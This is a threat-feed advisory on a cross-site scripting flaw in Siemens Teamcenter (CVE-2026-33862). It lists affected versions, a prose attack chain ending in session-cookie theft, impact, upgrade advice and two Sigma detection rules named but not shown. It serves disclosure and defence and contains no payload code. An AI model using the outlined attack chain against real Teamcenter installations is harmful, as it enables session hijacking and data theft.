Skip to content
Threat Feed
medium advisory

Siemens Teamcenter Vulnerability CVE-2026-33862 - Cross-Site Scripting

Siemens Teamcenter versions V2312 (before V2312.0014), V2406 (before V2406.0012), V2412 (before V2412.0009), V2506 (before V2506.0005), and V2512 are vulnerable to cross-site scripting (XSS) due to improper encoding or filtering of user-supplied data, potentially leading to arbitrary code execution by other users.

A cross-site scripting (XSS) vulnerability, identified as CVE-2026-33862, affects multiple versions of Siemens Teamcenter. Specifically, Teamcenter V2312 (all versions before V2312.0014), Teamcenter V2406 (all versions before V2406.0012), Teamcenter V2412 (all versions before V2412.0009), Teamcenter V2506 (all versions before V2506.0005), and Teamcenter V2512 are impacted. The vulnerability stems from the application’s failure to properly encode or filter user-supplied data. This flaw allows a remote attacker to inject malicious scripts into the application that can then be executed by other users when they interact with the affected page, potentially leading to data theft, session hijacking, or other malicious activities. The vulnerability was reported on 2026-05-12.

Attack Chain

  1. An attacker crafts a malicious payload containing JavaScript code.
  2. The attacker injects the payload into a vulnerable Teamcenter input field, such as a comment, name, or description.
  3. The attacker submits the form or triggers the action that saves the malicious input to the Teamcenter database.
  4. A legitimate user accesses the page or resource where the injected payload is displayed.
  5. The victim’s web browser executes the attacker-controlled JavaScript code within the context of the Teamcenter web application.
  6. The malicious script can then perform actions such as stealing the user’s session cookies, redirecting the user to a malicious website, or modifying the content of the page.
  7. The attacker can use the stolen session cookie to impersonate the user and gain unauthorized access to Teamcenter.

Impact

Successful exploitation of this XSS vulnerability (CVE-2026-33862) could lead to the execution of arbitrary JavaScript code in the context of other Teamcenter users’ browsers. This can result in session hijacking, theft of sensitive information, defacement of the application, or redirection to malicious websites. Given the potential for unauthorized access and data manipulation, this vulnerability poses a significant risk to organizations using affected versions of Siemens Teamcenter.

Recommendation

  • Upgrade to the latest versions of Teamcenter: V2312.0014, V2406.0012, V2412.0009, V2506.0005, or V2512 to remediate CVE-2026-33862 (see references).
  • Deploy the Sigma rule Detect Suspicious Teamcenter URI Activity to identify potential exploitation attempts by monitoring for specific patterns in HTTP requests.
  • Implement input validation and output encoding mechanisms within the Teamcenter application to prevent XSS attacks.

Detection coverage 2

Detect Suspicious Teamcenter URI Activity

medium

Detects CVE-2026-33862 exploitation — Monitors for suspicious characters in Teamcenter URI requests indicative of XSS attempts.

sigma tactics: initial_access techniques: T1068, T1190 sources: webserver

Detect Teamcenter URI XSS Attempt via Base64 Encoded Payload

medium

Detects CVE-2026-33862 exploitation — Monitors for base64 encoded strings in Teamcenter URI requests indicative of obfuscated XSS payloads.

sigma tactics: initial_access techniques: T1068, T1190 sources: webserver

Detection queries are available on the platform. Get full rules →